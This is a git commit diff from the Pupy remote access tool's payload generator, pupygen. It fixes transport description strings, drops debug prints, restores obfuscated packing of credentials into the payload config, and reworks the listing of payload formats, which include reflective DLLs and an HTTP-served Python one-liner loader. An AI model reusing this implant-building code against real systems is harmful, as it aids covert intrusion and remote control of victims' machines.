fix pupygen -l

This commit is contained in:
n1nj4sec 2016-06-13 19:57:42 +02:00
parent 1dfa53265c
commit bcf03c6d07
3 changed files with 12 additions and 15 deletions

View File

@ -6,7 +6,7 @@ from network.lib import *
from network.lib.transports.obfs3.obfs3 import Obfs3Client, Obfs3Server from network.lib.transports.obfs3.obfs3 import Obfs3Client, Obfs3Server
class TransportConf(Transport): class TransportConf(Transport):
info = "TCP transport using obfsproxy's obfs3 transport with a extra rsa+aes layer", info = "TCP transport using obfsproxy's obfs3 transport with a extra rsa+aes layer"
name = "obfs3" name = "obfs3"
server = PupyTCPServer server = PupyTCPServer
client = PupyTCPClient client = PupyTCPClient

View File

@ -7,7 +7,7 @@ from network.lib.transports.scramblesuit.scramblesuit import ScrambleSuitClient,
class TransportConf(Transport): class TransportConf(Transport):
info = "TCP transport using obfsproxy's obfs3 transport with a extra rsa+aes layer", info = "TCP transport using obfsproxy's obfs3 transport with a extra rsa+aes layer"
name = "scramblesuit" name = "scramblesuit"
server = PupyTCPServer server = PupyTCPServer
client = PupyTCPClient client = PupyTCPClient

View File

@ -77,13 +77,12 @@ def get_raw_conf(conf, obfuscate=False):
else: else:
print colorize("[!] ", "yellow")+"[-] Credential %s have not been found for transport %s. Fall-back to default credentials. You should edit your crypto/credentials.py file"%(c, l.get_transport()) print colorize("[!] ", "yellow")+"[-] Credential %s have not been found for transport %s. Fall-back to default credentials. You should edit your crypto/credentials.py file"%(c, l.get_transport())
pupy_credentials_mod={"pupy_credentials.py" : cred_src} pupy_credentials_mod={"pupy_credentials.py" : cred_src}
print pupy_credentials_mod
#new_conf+=compress_encode_obfs("pupyimporter.pupy_add_package(%s)"%repr(cPickle.dumps(pupy_credentials_mod)))+"\n" new_conf+=compress_encode_obfs("pupyimporter.pupy_add_package(%s)"%repr(cPickle.dumps(pupy_credentials_mod)))+"\n"
new_conf+=obf_func("LAUNCHER=%s"%(repr(conf['launcher'])))+"\n" new_conf+=obf_func("LAUNCHER=%s"%(repr(conf['launcher'])))+"\n"
new_conf+=obf_func("LAUNCHER_ARGS=%s"%(repr(conf['launcher_args'])))+"\n" new_conf+=obf_func("LAUNCHER_ARGS=%s"%(repr(conf['launcher_args'])))+"\n"
new_conf+=offline_script new_conf+=offline_script
new_conf+="\n" new_conf+="\n"
print new_conf
return new_conf return new_conf
@ -210,23 +209,21 @@ def parse_scriptlets(args_scriptlet, debug=False):
class ListOptions(argparse.Action): class ListOptions(argparse.Action):
def __call__(self, parser, namespace, values, option_string=None): def __call__(self, parser, namespace, values, option_string=None):
print colorize("## available formats :", "green") print colorize("## available formats :", "green")+" usage: -f <format>"
print "\t- exe_86, exe_x64 : generate PE exe for windows" print "\t- exe_86, exe_x64 : generate PE exe for windows"
print "\t- dll_86, dll_x64 : generate reflective dll for windows" print "\t- dll_86, dll_x64 : generate reflective dll for windows"
print "\t- py : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)" print "\t- py : generate a fully packaged python file (with all the dependencies packaged and executed from memory), all os (need the python interpreter installed)"
print "\t- py_oneliner : same as \"py\" format but served over http to load it from a single command line" print "\t- py_oneliner : same as \"py\" format but served over http to load it from a single command line"
print "" print ""
print colorize("## available transports :","green") print colorize("## available transports :","green")+" usage: -t <transport>"
for name, dic in transports.iteritems(): for name, tc in transports.iteritems():
print "\t- {}".format(name,) try:
print "\t {:<15} : {}".format("description", dic["info"]) print "\t- {:<14} : {}".format(name, tc.info)
arguments=','.join([x for x in dic["client_kwargs"].iterkeys()])+','.join([x for x in dic["client_transport_kwargs"].iterkeys()]) except Exception as e:
if not arguments: logging.error(e)
arguments = "none"
print "\t {:<15} : {}".format("arguments" ,arguments)
print colorize("## available scriptlets :", "green") print colorize("## available scriptlets :", "green")+" usage: -s <scriptlet>,<arg1>=<value>,<args2=value>..."
scriptlets_dic=load_scriptlets() scriptlets_dic=load_scriptlets()
for name, sc in scriptlets_dic.iteritems(): for name, sc in scriptlets_dic.iteritems():
print "\t- {:<15} : ".format(name) print "\t- {:<15} : ".format(name)